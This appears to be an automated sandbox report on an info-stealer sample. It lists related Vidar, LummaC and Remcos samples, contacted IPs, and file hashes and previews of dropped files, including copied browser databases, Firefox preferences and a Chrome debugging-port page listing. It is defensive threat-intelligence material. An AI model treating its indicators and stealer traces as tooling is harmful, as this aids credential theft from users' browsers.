DypA6KbLrn.lnk | malicious | Unknown | 116.203.13.109, 149.154.167.99
IOnqEVA4Dz.lnk | malicious | Unknown | 116.203.13.109, 149.154.167.99
HngJMpDqxP.lnk | malicious | Unknown | 116.203.13.109, 149.154.167.99
setup.msi | malicious | Unknown | 116.203.13.109, 149.154.167.99
GYede3Gwn0.lnk | malicious | Unknown | 116.203.13.109, 149.154.167.99

Match: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Associated Sample Name / URL | Detection | Threat Name | Context
over.ps1 | malicious | Vidar |
MatAugust.exe | malicious | Vidar |
6684V5n83w.exe | malicious | Vidar |
vlid_acid.exe | malicious | LummaC Stealer |
AquaPac.exe | malicious | LummaC Stealer |
0442.pdf.exe | malicious | Remcos |
installer_1.05_36.5.exe | malicious | LummaC |
@Setup.exe | malicious | LummaC Stealer |
!Set-up..exe | malicious | LummaC Stealer |
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):126976
                                                                                                                                                                                                                                                              Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                              MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                              SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                              SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                              SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):9571
                                                                                                                                                                                                                                                              Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                                                              MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                                                              SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                                                              SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                                                              SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):159744
                                                                                                                                                                                                                                                              Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                              MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                              SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                              SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                              SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):98304
                                                                                                                                                                                                                                                              Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):294912
                                                                                                                                                                                                                                                              Entropy (8bit):0.08436842005578409
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                                                                                                                                                              MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                                                                                                                                                              SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                                                                                                                                                              SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                                                                                                                                                                                              SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                              Size (bytes):947288
                                                                                                                                                                                                                                                              Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                              MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                              SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                              SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                              SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                                              • Filename: over.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: MatAugust.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: 6684V5n83w.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: vlid_acid.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: AquaPac.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: 0442.pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: !Set-up..exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):553082
                                                                                                                                                                                                                                                              Entropy (8bit):7.999632931333854
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:12288:nLIkNWuYx5ChEy+1X/0XDjbU8FnJzG4RXx9n7kP1JAvEEvDu+7X:nPM1x5lvXco8FJzzXcP1JWvxr
                                                                                                                                                                                                                                                              MD5:E4B81AE7DDC3C4BDA8F848165607E1FD
                                                                                                                                                                                                                                                              SHA1:4F72902129AA422FFB1EEA08EF2791D6063F855B
                                                                                                                                                                                                                                                              SHA-256:6110FDF4CE25C3DBE2B4071ED01D61C22074ED4C9007FC84ACF52A7556E1238B
                                                                                                                                                                                                                                                              SHA-512:6ABCCD18805A5E6E5352092953E37A678B38C90EDBB48DA42105114A1E0DC33BE45F3EFF597C5AF3CCEED7855CD915C87FB5869A6E967B691A307E78C8C046D6
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):51200
                                                                                                                                                                                                                                                              Entropy (8bit):7.996134997391113
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:yrD2beNrqP00aY+iNqat6Pl1/SM4uW6m9/A:C6barjY+iNLt6jlta4
                                                                                                                                                                                                                                                              MD5:D47D264E45EAE9E710ABE7D637233B58
                                                                                                                                                                                                                                                              SHA1:53739DB46BDC02ABCBE729C543F89A68AEA5F851
                                                                                                                                                                                                                                                              SHA-256:6C95197DFD4D23CAA89C38802FF9D0EC646889F180348E161D467635E4BEADD8
                                                                                                                                                                                                                                                              SHA-512:51CC502781C3204901C6EEFCF6233CEFEF2B99D2D5A63FD047D795619DE7B3D2F0E38B8C7CB32920963232F0CA60ED6F2490984146C662C4CBEF5184F6EEA451
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):2488
                                                                                                                                                                                                                                                              Entropy (8bit):5.333442326623889
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:59n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+1:zSEA5O5W+MfH5S1CqlVJcIn
                                                                                                                                                                                                                                                              MD5:3A19F105F8D5FEC8C6A8D87CB00FA6F3
                                                                                                                                                                                                                                                              SHA1:0800FA54FCC35081296B0A5917C724AB4F8EA858
                                                                                                                                                                                                                                                              SHA-256:C76AD62BD8428160A4A87AD0A1D4971A93B6A7EAD0A807260E2DEEF7376C8E32
                                                                                                                                                                                                                                                              SHA-512:9BCA68DE1A85C68D6F06A3849E44FEA0E84B0EB3D3D8DE7A61D3658920D46C8E8BE9F914254BBF3307084B6B1E707F3EC87128D25BB3841BF0D5ADEC72CCD7A0
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:Borough........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):72704
                                                                                                                                                                                                                                                              Entropy (8bit):7.997711091236596
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:8uaZ2xT3ltgrK6cj0oX/bEUFk24ZFMnl+unTau3rJxZBF/t4:DaQxTVCKzX/bEUh48ljnmYrB/t4
                                                                                                                                                                                                                                                              MD5:7EDC088EA18D136349CE4CD9F745A697
                                                                                                                                                                                                                                                              SHA1:8608732CE65DCFD2C7D944C565FB8B791A7D7D9A
                                                                                                                                                                                                                                                              SHA-256:4006413ABDC83DDD16E4FC84DE95D3A228EAEAA4FF60957CDD00547F4F3CF938
                                                                                                                                                                                                                                                              SHA-512:BD4355C4B55895D069A793610FC132D0D0E2A6C6B786C6405A0A096B61E9FDBC7C19BB86D0735AD8437B1B60289C67C0E43923B1354DC27EB738CE42BF5D88E1
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):133120
                                                                                                                                                                                                                                                              Entropy (8bit):4.733916021488669
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:Ux/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8W:UdKaj6iTcPAsAhxjgarB/5el3EYr/
                                                                                                                                                                                                                                                              MD5:5FD9525979AD66C9D36FF94F2B4B52F6
                                                                                                                                                                                                                                                              SHA1:495625B20C9021814D31F5DD00C5DCE9624F2466
                                                                                                                                                                                                                                                              SHA-256:6E27A1BF8E7342064796FC5F06126A9970D4222B358EC345381317A686149160
                                                                                                                                                                                                                                                              SHA-512:DC7BF631D30E12FFD70D1DF469411AB0CF1EC497E5F6E574800F546EC2E85E4DFFF4D3A5D5EC459948384E333B468F5DC291ECE0A86BDE2C3F9951B0808B4E04
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):78503
                                                                                                                                                                                                                                                              Entropy (8bit):7.044613853727578
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:LWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:LWy4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                                                                                                              MD5:5C6F41C0268628634F15322DCB795D06
                                                                                                                                                                                                                                                              SHA1:903F752982685C9BF026F32633BDEB8CB1698D2E
                                                                                                                                                                                                                                                              SHA-256:D72C7C02B285FAB500E4C44697E9929ACB3164A36933390E4280A2927B2AD7B0
                                                                                                                                                                                                                                                              SHA-512:9381D110BC2E0FB1BE70E24E165802DA2F0DC924BEE237497C93CD31DB685E8583E0C0446D96A868DB8FAF285CF318A71E7B1233B4024CB42AF6A6982982F36D
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, 489057 bytes, 11 files, at 0x2c +A "Sends" +A "Bridal", ID 9186, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):489057
                                                                                                                                                                                                                                                              Entropy (8bit):7.998492788521347
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:12288:BgPIcqjh190RYzhItzlG5Tv/RQC8PvwL6r0xVbL:qLw19VIWh5fIK6k
                                                                                                                                                                                                                                                              MD5:C26A460497E43B38F8321C639581944B
                                                                                                                                                                                                                                                              SHA1:CBC0EA8D32050E83CC987065F15C7FC242E232F7
                                                                                                                                                                                                                                                              SHA-256:D516337A6B25EEEBFC7399C6E39413B7A21526FCE7FA5E1273968AAA83FBAF47
                                                                                                                                                                                                                                                              SHA-512:745F4C89DB82B05A1D306C88CA0BD8A01D6F1ADA70BD702981FD0A708684D5408E0885B93C5F79EB21D27A11CCF78D2BEBC36894C3D67CE96B4AD79876609A37
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:MSCF....av......,................#..?........X.........Yy. .Sends......X.....Yy. .Bridal......`.....Yy. .Sexuality..2...H.....Yy. .Cartoons..$...z.....Yy. .Root..8.........Yy. .Functional............Yy. .Petroleum............Yy. .Preparing............Yy. .Architecture....._......Yy. .State....._......Yy. .Exhibitions..q.G..CK.}}\TU....`..;......Q.I....LF.....%.j3.#V..wF.^..m...m...n%X.....Qb..X.v..[.......{g.P......_}.{^...<.9..9.^&.(..~.,..^..[..@N0..KI"..6.P...&;]SowP.*..G.....?N....X..W.o....Po..Wt.j...%Y....g.a..'.2...`......h.E ...t?b.=I..2......B.Qv...wcS.UKejh.L..~.\.9.r5.E..J.M...3..=...H^..Q...L.....H.:.K/#..1.C..].....7[.U,.ni.P........e..C.../.R.:.1...L+e.(6V......4......FS.z..H8*..YK9.J7!...........J...c.9zJ.......0....`.NH..sGdO.$.URR..1..H8..........:.."X..r.%.j.V..jq..C.r.......>..5..4...._ .G...%<..3R}.....^O..}..U...+........+#)...m......G.......V..5..z.2=v9........."L9......'.aQ.)Lx.......d...."y].pD^g.....9...%.f.I.e.h
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):123904
                                                                                                                                                                                                                                                              Entropy (8bit):6.567515078748226
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:npmESv+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Ddm:np6vmVnjphfhnvO5bLezWWt/Ddm
                                                                                                                                                                                                                                                              MD5:FFBB082C908BD3E08F3AF18C2D440A0F
                                                                                                                                                                                                                                                              SHA1:FA21533018109D09627C294A3C6200DA35B11C4D
                                                                                                                                                                                                                                                              SHA-256:4A7DB0E32E3FFAE93D27FD9B0AF215A47B82EFD86213A582FBE88F74993E0933
                                                                                                                                                                                                                                                              SHA-512:8C53D635FEE18ECA2D9DE4425BA80B662AB2E7FCCFBD1E419F17A73DBD6E5F6E0B6472B8D0EDF136DA337A539B05210ACBCD92C2BCB1B241BDE23315FB32EDE9
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):145408
                                                                                                                                                                                                                                                              Entropy (8bit):6.714052498898769
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:W5mjccBiqXvpgF4qv+32eOyKODOSpQSAU4CE0Imbi8u:WaccB3gBmmLsiS+SAhClbfu
                                                                                                                                                                                                                                                              MD5:7942C65297CD539C5ED3EA8E564BC2FD
                                                                                                                                                                                                                                                              SHA1:DFDC7445E461B1C0F282F3AA1EE3ADCC2319A501
                                                                                                                                                                                                                                                              SHA-256:8D19E2EEDF53111B5CAA100DC22A7A92104049418B57794AA7E8124E40613537
                                                                                                                                                                                                                                                              SHA-512:05761FE1C0C6762AF72112FBF34F6788F4274F4975FFDAA60B5CCDFE39268F33A07ED767B2D16E1AABBE867E6D6E0E27E005612E1DC9648E326031E775C13A18
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1787
                                                                                                                                                                                                                                                              Entropy (8bit):5.375707273114721
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:SfNaoCZTEClfNaoCsCjfNaoC5C7fNaoCRKMYE0UrU0U8CRf:6NnCZTECRNnCsCbNnC5CTNnC0y0UrU0o
                                                                                                                                                                                                                                                              MD5:72554BFA40D781799DB1D6B3607A0D88
                                                                                                                                                                                                                                                              SHA1:3FFC348AEE2B85D4CC0905E3C63F0D23346AAE9E
                                                                                                                                                                                                                                                              SHA-256:4F26BA683EB72181E71609E1DA2EABB25D9A9FD4FCB9B831438B60FAC69E534A
                                                                                                                                                                                                                                                              SHA-512:1287CAF7F12DFF80560A4AEEA01124415F721DA8F308319613962B22D1C247EB3BB28711BDA9955A66021A917147CE28742DB24608E8DC049EBC9E80D5D8A02C
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/4EBD1E93FF6ADF0E02738810C68696D8",.. "id": "4EBD1E93FF6ADF0E02738810C68696D8",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/4EBD1E93FF6ADF0E02738810C68696D8"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/27DE81E65D9C02E04C2949791E5B1B67",.. "id": "27DE81E65D9C02E04C2949791E5B1B67",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/27DE81E65D9C02E04C2949791E5B1B67"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):93184
                                                                                                                                                                                                                                                              Entropy (8bit):7.998097790503227
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:BXVhigFCwXuQ8nB9aY91CdWnrJ8UHaqPnwK9FCbROLWYx:BFhigmR+2W4rWUHaqvt7CbkC4
                                                                                                                                                                                                                                                              MD5:9804BA7BDDDEFB9FD2530596F2279AFD
